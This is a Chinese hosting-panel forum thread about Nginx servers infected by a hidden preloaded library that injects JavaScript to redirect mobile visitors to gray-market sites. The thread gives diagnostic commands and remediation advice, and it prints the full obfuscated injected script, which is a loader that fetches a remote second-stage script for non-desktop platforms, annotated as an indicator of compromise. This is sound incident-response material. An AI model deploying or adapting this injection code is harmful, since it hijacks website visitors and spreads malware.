【待反馈】手机端首次访问会跳转灰产网站的进
在终端执行下面的命令查看 Nginx 二进制加载了哪些共享库(不同系统路径/命令可能略有差异,以你实际的 Nginx 路径为准):

ldd /www/server/nginx/sbin/nginx

如果你的 Nginx 是正常的,会返回类似下面的内容(只有系统库和 /usr/local/lib 下的 jemalloc、luajit):
linux-vdso.so.1 (0x00007fff05e6b000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007f9299c54000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007f9299c1a000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007f9299b8c000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f9299b70000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007f929998e000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007f9299926000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f92996fb000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f92994cf000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f92994af000)
/lib64/ld-linux-x86-64.so.2 (0x00007f929a4e3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f92993c8000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007f92991cd000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f92991a2000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007f9299165000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007f929911b000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007f9299053000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007f9298fd2000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007f9298fbd000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007f9298f34000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007f9298ec5000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007f92972a7000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007f9297276000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007f929726d000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007f929725f000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007f929711d000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007f929704e000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007f929703d000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007f9297019000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007f9296ff6000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007f9296fca000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007f9296fc4000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007f9296fbc000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007f9296fa4000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007f9296f97000)

经过多台服务器的对比,出现我发帖标题所述情况(手机端首次访问跳转灰产)的机器,会返回:
linux-vdso.so.1 (0x00007fff25feb000)
/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)
libjemalloc.so.2 => /usr/local/lib/libjemalloc.so.2 (0x00007fcf73b79000)
libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fcf7417d000)
libluajit-5.1.so.2 => /usr/local/lib/libluajit-5.1.so.2 (0x00007fcf740ef000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007fcf740d3000)
libxml2.so.2 => /lib/x86_64-linux-gnu/libxml2.so.2 (0x00007fcf73997000)
libgd.so.3 => /lib/x86_64-linux-gnu/libgd.so.3 (0x00007fcf74069000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcf7376e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fcf74064000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007fcf73542000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007fcf74044000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcf747b3000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fcf7345b000)
libicuuc.so.70 => /lib/x86_64-linux-gnu/libicuuc.so.70 (0x00007fcf73260000)
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007fcf74017000)
libpng16.so.16 => /lib/x86_64-linux-gnu/libpng16.so.16 (0x00007fcf73225000)
libfontconfig.so.1 => /lib/x86_64-linux-gnu/libfontconfig.so.1 (0x00007fcf731db000)
libfreetype.so.6 => /lib/x86_64-linux-gnu/libfreetype.so.6 (0x00007fcf73113000)
libjpeg.so.8 => /lib/x86_64-linux-gnu/libjpeg.so.8 (0x00007fcf73092000)
libXpm.so.4 => /lib/x86_64-linux-gnu/libXpm.so.4 (0x00007fcf7307d000)
libtiff.so.5 => /lib/x86_64-linux-gnu/libtiff.so.5 (0x00007fcf72ff4000)
libwebp.so.7 => /lib/x86_64-linux-gnu/libwebp.so.7 (0x00007fcf72f87000)
libicudata.so.70 => /lib/x86_64-linux-gnu/libicudata.so.70 (0x00007fcf71369000)
libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007fcf71338000)
libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007fcf7132f000)
libbrotlidec.so.1 => /lib/x86_64-linux-gnu/libbrotlidec.so.1 (0x00007fcf71321000)
libX11.so.6 => /lib/x86_64-linux-gnu/libX11.so.6 (0x00007fcf711e1000)
libzstd.so.1 => /lib/x86_64-linux-gnu/libzstd.so.1 (0x00007fcf71112000)
libjbig.so.0 => /lib/x86_64-linux-gnu/libjbig.so.0 (0x00007fcf71101000)
libdeflate.so.0 => /lib/x86_64-linux-gnu/libdeflate.so.0 (0x00007fcf710dd000)
libbrotlicommon.so.1 => /lib/x86_64-linux-gnu/libbrotlicommon.so.1 (0x00007fcf710b8000)
libxcb.so.1 => /lib/x86_64-linux-gnu/libxcb.so.1 (0x00007fcf7108e000)
libXau.so.6 => /lib/x86_64-linux-gnu/libXau.so.6 (0x00007fcf71088000)
libXdmcp.so.6 => /lib/x86_64-linux-gnu/libXdmcp.so.6 (0x00007fcf71080000)
libbsd.so.0 => /lib/x86_64-linux-gnu/libbsd.so.0 (0x00007fcf71068000)
libmd.so.0 => /lib/x86_64-linux-gnu/libmd.so.0 (0x00007fcf71059000)

可以看到多了一个不属于 Nginx 正常依赖的库:

/var/adm/2dbd78ae-b3fd-4d69-9aac-153cb140294d/kernel/libutilkeybd.so (0x00007fcf73e00000)

注意这一行没有 `=>`,而且排在 linux-vdso 之后、所有正常依赖之前——这与通过 /etc/ld.so.preload 或 LD_PRELOAD 预加载进来的库在 ldd 输出中的形态一致(需要在你的机器上核实,例如:`cat /etc/ld.so.preload`、`readelf -d /www/server/nginx/sbin/nginx | grep NEEDED`(看二进制本身是否被改)、`tr '\0' '\n' < /proc/<nginx主进程pid>/environ | grep LD_`、`grep -v -e ' /lib' -e ' /usr/lib' /proc/<nginx worker pid>/maps`(看实际映射进内存的库))。这个 .so 不一定在 /var/adm,也可能在 /etc/adm 之类的路径,UUID 目录名也可能不同。如果用 `ls` 看不到这个目录,而 `ldd` 或 `/proc/<pid>/maps` 里仍能看到该路径,大概率是这个库 hook 了 readdir/stat 之类的函数把自己隐藏了(预加载型 rootkit 的典型做法)。这种情况下不要再信任被入侵主机上 ls/ps/netstat 等工具的输出,应使用静态编译的工具或从救援系统挂载磁盘来检查。
这个库会在 Nginx 返回给浏览器的网站 JS 文件里注入下面这段恶意代码(从现象看是随机选择文件、且只在部分请求上注入),达到手机端首次访问时跳转灰产站的效果。注入发生在 Nginx 进程内、响应发出之前,所以磁盘上的网站文件是干净的、校验不出问题,把站点迁到别的服务器也就不再出现(这也解释了后面几楼"检查网站没问题"的现象)。要确认注入,可以用 curl 直接抓取页面引用的 JS 文件,与磁盘上的同名文件做 diff(如果注入按来源 IP / 首次访问做了条件判断,可能需要换 IP 或 UA 多试几次);是否跳转则是在浏览器端由 navigator.platform 决定的,所以 Windows/macOS 桌面浏览器通常看不到跳转。
// Malware sample exactly as posted (injected into served JS by the tampered Nginx loader described above).
// Reproduced byte-for-byte as an indicator of compromise; do NOT run it. Comments are analysis only.
// Structure: run-once guard -> two decoders (UTF-8, base64) -> a window-global loader -> platform gate.
if (window && !window.hijs) {
// Run-once flag for this page load. The presence of `window.hijs` / `!window.hijs` is a cheap
// string marker to grep for in a site's served JS.
window.hijs = true;
// Decodes a string whose char codes are raw UTF-8 bytes (one char per byte, as produced by the
// base64 decoder below) into text, handling 1-, 2- and 3-byte sequences.
// Note the implicit globals r, c1, c2, c3 (no `var`) - typical of this obfuscated family.
function xxSJRox(e) {
var t = ""
, n = r = c1 = c2 = 0;
while (n < e.length) {
r = e.charCodeAt(n);
if (r < 128) {
t += String.fromCharCode(r);
n++
} else if (r > 191 && r < 224) {
c2 = e.charCodeAt(n + 1);
t += String.fromCharCode((r & 31) << 6 | c2 & 63);
n += 2
} else {
c2 = e.charCodeAt(n + 1);
c3 = e.charCodeAt(n + 2);
t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63);
n += 3
}
}
return t
}
// Standard base64 decoder. It first strips every character outside the base64 alphabet, so
// arbitrary non-alphabet junk in the payload string is ignored; the resulting bytes are then
// UTF-8-decoded via xxSJRox. This is what turns the first IIFE argument into the remote URL.
function aPnDhiTia(e) {
var m = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var t = "", n, r, i, s, o, u, a, f = 0;
e = e.replace(/[^A-Za-z0-9+/=]/g, "");
while (f < e.length) {
s = m.indexOf(e.charAt(f++));
o = m.indexOf(e.charAt(f++));
u = m.indexOf(e.charAt(f++));
a = m.indexOf(e.charAt(f++));
n = s << 2 | o >> 4;
r = (o & 15) << 4 | u >> 2;
i = (u & 3) << 6 | a;
t = t + String.fromCharCode(n);
if (u != 64) {
t = t + String.fromCharCode(r)
}
if (a != 64) {
t = t + String.fromCharCode(i)
}
}
return xxSJRox(t)
}
// '\x4d\x66\x58\x4b\x77\x56' is hex-escaped "MfXKwV" and eval('window') is just `window`; both are
// obfuscation. This defines window.MfXKwV, the loader invoked at the bottom of the block.
eval('window')['\x4d\x66\x58\x4b\x77\x56'] = function() {
// Parameters: u = base64 of the remote script URL, r/f/c = junk tokens, w = window, d = document.
;(function(u, r, w, d, f, c) {
var x = aPnDhiTia;
// Collapse doubled junk token c to a single c, base64-decode, then URL-decode. With the arguments
// as pasted, u contains no occurrence of c, so the replace is a no-op here.
u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c,'g'), c)));
// Bare string literals ('jQuery', 'Flex', 'CSS') are no-op decoys.
'jQuery';
// k and v are implicit globals; the element tag name is assembled from the junk arguments.
k = r + 'c' + f;
'Flex';
v = k + f;
// NOTE(review): with the argument strings exactly as pasted, v + c + c does not spell "script"
// (createElement would yield an unknown element that never loads its .src), and
// getElementsByTagName('head') is an HTMLCollection with no appendChild, so this transcription would
// throw. The in-the-wild copy presumably differs in these details (e.g. a real tag name and [0] on the
// collection) - match on the structure and marker strings, not on these literals.
var s = d.createElement(v + c + c)
, g = function() {};
s.type = 'text/javascript';
// Redundant bare block around a no-op onload handler - more obfuscation padding.
{
s.onload = function() {
g()
}
}
// Remote payload URL: the second stage is fetched as an external script.
s.src = u;
'CSS';
d.getElementsByTagName('head').appendChild(s)
}
// First argument: the poster deliberately corrupted the middle of the base64 so the real URL cannot
// be recovered. The prefix 'aHR0cHM6' is base64 for "https:"; assuming the tail is still aligned, it
// decodes to something like ".../npm/bootstrap@5.3.0/dist/css/bootstrap.min.css?v=3.7.8.2" - a path
// disguised as a CDN-hosted Bootstrap asset, served from a host that is not the real CDN.
)('aHR0cHM6和谐一段,防止解析出来正确的xpdnIuY29tL25wbS9ib290c3RyYXBANS4zLjAvZGlzdC9jc3MvYm9vdHN0cmFwLm1pbi5jc3M/dj0zLjcuOC4y', 'FgsPmaNtZ', window, document, 'jrGYBsijJU', 'ptbnNbK')
}
;
// Platform gate: /^Mac|Win/ means "starts with Mac" OR "contains Win" anywhere. Every other
// navigator.platform value (Android reports "Linux ...", iOS "iPhone"/"iPad", and Linux desktops too)
// triggers the loader - which is why the redirect is seen on phones but not on Windows/macOS desktops.
// It keys on navigator.platform, not the User-Agent, so changing only the UA in a desktop browser may
// not reproduce it.
if (!(/^Mac|Win/.test(navigator.platform)))
MfXKwV();
}
**威胁类型**: Web 服务器进程被植入恶意共享库(动态链接/预加载劫持,带目录隐藏的 rootkit 行为)+ 响应内容中的 JavaScript 注入 + 二阶段远程脚本加载与灰产跳转。严格来说这不是"中间人攻击":篡改发生在你自己的服务器进程内,而不是在网络链路上,所以 HTTPS 防不住它;CSP 的 script-src 白名单理论上能拦下第二阶段的外部脚本,但攻击者既然控制了 Nginx 进程,也能改掉响应头,不能把它当作依靠。
不知道能不能通过重装 NGINX 来解决。(从下面几楼的反馈看,仅重装 Nginx 并不能解决:如果劫持是通过 /etc/ld.so.preload 之类的全局预加载机制实现的,新装的 Nginx 二进制同样会被加载进去;换成 Apache 不再跳转,只说明这个库针对的是 Nginx 进程,不代表主机已经干净。)
反正我是直接备份了数据、直接重装系统,就没有这个库了。至于怎么被篡改的尚未可知,手里的几台物理机全部遭殃,目前重装了一台,等待测试看什么时候再次被篡改。
如果你有不通过重装系统的解决办法欢迎分享。
(补充给后来者:入侵途径未知,而且后面有人反馈修复后不到一周再次中招,所以重装系统只是第一步。重装后务必:更换面板、SSH、数据库、FTP 等所有口令和密钥;检查并清理陌生的 authorized_keys、cron、systemd 服务、面板账号和计划任务;把面板端口和 SSH 限制为只允许自己的 IP 访问;把系统、面板和站点程序升级到最新版;用重装前的磁盘镜像或备份日志(面板日志、Nginx access log、auth.log/journal)去查入侵来源,而不是在已清理的系统上找。否则同一入口会被再次利用,重装只是重复劳动。)
你好,感谢发帖,可以的话您联系我们官网客服,我司安全部协助您排查下 堡塔开发kk 发表于 2025-11-18 11:00
你好,感谢发帖,可以的话您联系我们官网客服,我司安全部协助您排查下
var/adm 这个目录昨天我发帖时还是可见的9.6.0版本 我刚刚升级了 11.2版本这个目录就被隐藏了 我另外9.6的服务器还是可见 面板也占一定原因? 24143751 发表于 2025-11-18 16:05
var/adm 这个目录昨天我发帖时还是可见的9.6.0版本 我刚刚升级了 11.2版本这个目录就被隐藏了 ...
面板升级和这个无关,联系客服 我们协助排查 六台服务器 全军覆没 全部重装了 没找到哪里的问题 我同事的好几个服务器 也是这种情况 卸载了nginx在重装 没解决问题 准确的说,是网站显示灰产内容,但是检查网站没问题,把网站迁移到别的服务器就没出现过 坚果互联 发表于 2025-11-21 23:10
准确的说,是网站显示灰产内容,但是检查网站没问题,把网站迁移到别的服务器就没出现过 ...
我的也是物理机中招,也是这个文件夹里面出现问题,还没试过重装,修复不到一个星期就再次出现这个 已经中招了,重装系统了,重装nginx没用,切到阿帕奇就不跳了 口香糖之歌 发表于 2025-11-29 11:36
我的也是物理机中招,也是这个文件夹里面出现问题,还没试过重装,修复不到一个星期就再次出现这个 ...
我的虚拟机也中了,而且是两次,不知道怎么办。